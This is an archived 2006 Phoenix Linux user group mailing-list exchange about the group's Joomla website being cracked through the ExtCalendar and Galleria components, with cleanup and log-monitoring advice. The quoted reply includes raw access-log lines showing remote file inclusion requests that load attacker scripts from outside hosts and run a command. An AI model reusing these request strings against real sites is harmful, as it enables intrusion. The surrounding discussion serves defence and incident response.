Re: PLUG website down

Top Page
This message is part of the following thread:
Mthe complete thread tree sorted by date
M\JD Austin at <-
MMDarrin Chandler at ->
Attachments:
Message as email
+ (text/plain)
Delete this message
Reply to this message
Author: Alan Dayley
Date:  
To: Main PLUG discussion list
Subject: Re: PLUG website down
JD Austin wrote:
> If you're not on version 1.0.10 upgrade now:
> http://www.joomla.org/content/view/1510/74/
> I wouldn't be surprised if they make major changes in Joomla to stomp
> out this type of thing.
>
> In all cases I've had an issue the database was unaffected, only the files.
> After the initial panic that I might have been rooted I was relieved
> when I found out how they whacked the index.php and configuration.php
> files on a few of my inactive sites.
>
> After you restore the site, remove com_extcalendar and com_galeria if
> they're still installed.
> Check the directory structure to make sure they're gone.
> Also check your temp directory for strangeness.. like a '.a' directory.
>
> If you check your logs you'll find stuff like this:
> 
>     XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
>     XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>     XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?_*mosConfig_absolute_path=*__*http*_://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

>
>
> I regularly check to see what they're trying to circumvent now by
> grepping for this type of vulnerability in the apache access logs:
> /bin/grep mosConfig_absolute_path=http
> /home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack
> attempts'
> The location of your apache logs may be different. If you don't have
> root you can download the logs for your domain and grep them locally.
>
> JD

Thanks, JD. Good advice.

I am in contact with Integrum. The site was, in fact, cracked via the
ext_calendar component that I thought I had patched. Integrum caught it
early this morning and took the site off line to thwart the attack. We
are now discussing the means of getting back online without re-instating
the vulnerability.

It will probably be tomorrow before the site is back online simply
because Integrum has been handling issues with it since very early this
morning. They need to leave it for a while.

I thank them for their efforts and support!

I'll be on the phone with them tomorrow morning. I'll keep updating
status here in the list.

Alan
---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change you mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

This message was posted to the following mailing lists:
Plug Discuss
Mailing List Info | Nearby Messages		<-Re: PLUG website downRe: PLUG website down->
Some Mailing List Archive administrated by UnconfiguredLurker (version 2.3)